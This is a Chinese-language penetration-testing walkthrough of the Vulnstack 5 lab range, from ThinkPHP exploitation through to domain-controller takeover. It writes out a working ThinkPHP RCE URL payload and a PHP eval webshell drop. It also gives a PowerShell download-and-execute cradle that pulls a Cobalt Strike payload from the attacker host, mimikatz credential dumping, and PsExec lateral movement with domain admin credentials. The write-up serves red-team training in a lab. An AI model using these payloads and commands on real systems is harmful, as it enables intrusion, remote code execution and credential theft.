Vulnstack 5
字数 1222 2025-08-11 21:26:29

Vulnstack 5 渗透测试实战教学文档

环境搭建

靶机配置

  • Win7系统

    • 账号密码:
      • leo@sun.com / 123.com
      • Administrator / dc123.com
    • 网络配置:
      • 外网:192.168.135.150 (NAT模式)
      • 内网:192.168.138.136
    • 注意事项:
      • 需启动C盘phpstudy服务
      • 必须关闭Win7防火墙

  • Win2008域控制器(DC)

    • 内网IP:192.168.138.138

攻击机配置

  • Kali Linux:192.168.135.166
  • Win10:192.168.135.1

渗透测试流程

1. 资产探测

端口扫描

nmap -sS -T4 192.168.135.150

发现服务

  • 80端口运行ThinkPHP框架(V5.0.22)

2. 漏洞利用

ThinkPHP RCE漏洞利用

http://192.168.135.150/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

验证执行命令

http://192.168.135.150/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=powershell pwd

3. 获取Webshell

上传Webshell

http://192.168.135.150/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][]=<?php @eval($_POST[xiaolv]); ?>

连接Webshell

  • 使用蚁剑连接:http://192.168.135.150/12345.php
  • 密码:xiaolv

4. 内网探测

使用fscan扫描内网

fscan.exe -h 192.168.138.1/24 -o 2.txt

扫描结果

  • 发现域控制器:192.168.138.138 (Win Server 2008)
  • 存在MS17-010漏洞

5. 横向移动

Cobalt Strike配置

  1. 创建teamserver: 
    ./teamserver <IP> <密码>
  2. 创建监听器:
    • 类型:HTTP
    • 端口:80
    • 名称:kali

生成无文件落地Payload

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.135.166:80/a'))"

提权操作

  • 使用mimikatz抓取密码: 
    mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
  • 获取域信息:
    • 域名:sun
    • 域管理员:Administrator / dc123.com

6. 域渗透

创建SMB Beacon监听

  • 名称:zhongzhuan
  • 选择已有system权限会话

生成后门

  • 生成333.exe并上传

使用PsExec横向移动

PsExec64.exe -accepteula \\192.168.138.138 -u sun\Administrator -p dc123.com -d -c C:\phpStudy\PHPTutorial\WWW\public\333.exe

获取域控权限

  • 成功上线后,使用mimikatz抓取所有用户hash

关键点总结

  1. ThinkPHP漏洞利用

    • 版本识别:通过错误页面获取版本信息
    • RCE利用:使用特定payload执行系统命令

  2. 内网渗透技巧

    • 双网卡环境下的网络拓扑理解
    • 使用fscan进行快速内网资产探测

  3. 横向移动方法

    • Cobalt Strike的SMB Beacon使用
    • PsExec在域环境中的运用

  4. 权限提升

    • 从普通用户到system权限的提权
    • 域管理员凭证的获取方法

  5. 后渗透阶段

    • 使用mimikatz抓取凭证和hash
    • 域环境下的权限维持技术

注意事项

  1. 确保Win7防火墙已关闭,否则可能导致网络不通
  2. 使用PsExec时注意-accepteula参数的使用
  3. 在真实环境中进行渗透测试前务必获得授权
  4. 注意Cobalt Strike监听器的配置,避免混淆

本教学文档完整还原了从外网渗透到内网域控的完整过程,涵盖了信息收集、漏洞利用、权限提升、横向移动等关键环节,可作为红队演练的参考案例。

Vulnstack 5 渗透测试实战教学文档 环境搭建 靶机配置 Win7系统 : 账号密码: leo@sun.com / 123.com Administrator / dc123.com 网络配置: 外网:192.168.135.150 (NAT模式) 内网:192.168.138.136 注意事项: 需启动C盘phpstudy服务 必须关闭Win7防火墙 Win2008域控制器(DC) : 内网IP:192.168.138.138 攻击机配置 Kali Linux :192.168.135.166 Win10 :192.168.135.1 渗透测试流程 1. 资产探测 端口扫描 : 发现服务 : 80端口运行ThinkPHP框架(V5.0.22) 2. 漏洞利用 ThinkPHP RCE漏洞利用 : 验证执行命令 : 3. 获取Webshell 上传Webshell : 连接Webshell : 使用蚁剑连接:http://192.168.135.150/12345.php 密码:xiaolv 4. 内网探测 使用fscan扫描内网 : 扫描结果 : 发现域控制器:192.168.138.138 (Win Server 2008) 存在MS17-010漏洞 5. 横向移动 Cobalt Strike配置 : 创建teamserver: 创建监听器: 类型:HTTP 端口:80 名称:kali 生成无文件落地Payload : 提权操作 : 使用mimikatz抓取密码: 获取域信息: 域名:sun 域管理员:Administrator / dc123.com 6. 域渗透 创建SMB Beacon监听 : 名称:zhongzhuan 选择已有system权限会话 生成后门 : 生成333.exe并上传 使用PsExec横向移动 : 获取域控权限 : 成功上线后,使用mimikatz抓取所有用户hash 关键点总结 ThinkPHP漏洞利用 : 版本识别:通过错误页面获取版本信息 RCE利用:使用特定payload执行系统命令 内网渗透技巧 : 双网卡环境下的网络拓扑理解 使用fscan进行快速内网资产探测 横向移动方法 : Cobalt Strike的SMB Beacon使用 PsExec在域环境中的运用 权限提升 : 从普通用户到system权限的提权 域管理员凭证的获取方法 后渗透阶段 : 使用mimikatz抓取凭证和hash 域环境下的权限维持技术 注意事项 确保Win7防火墙已关闭,否则可能导致网络不通 使用PsExec时注意-accepteula参数的使用 在真实环境中进行渗透测试前务必获得授权 注意Cobalt Strike监听器的配置,避免混淆 本教学文档完整还原了从外网渗透到内网域控的完整过程,涵盖了信息收集、漏洞利用、权限提升、横向移动等关键环节,可作为红队演练的参考案例。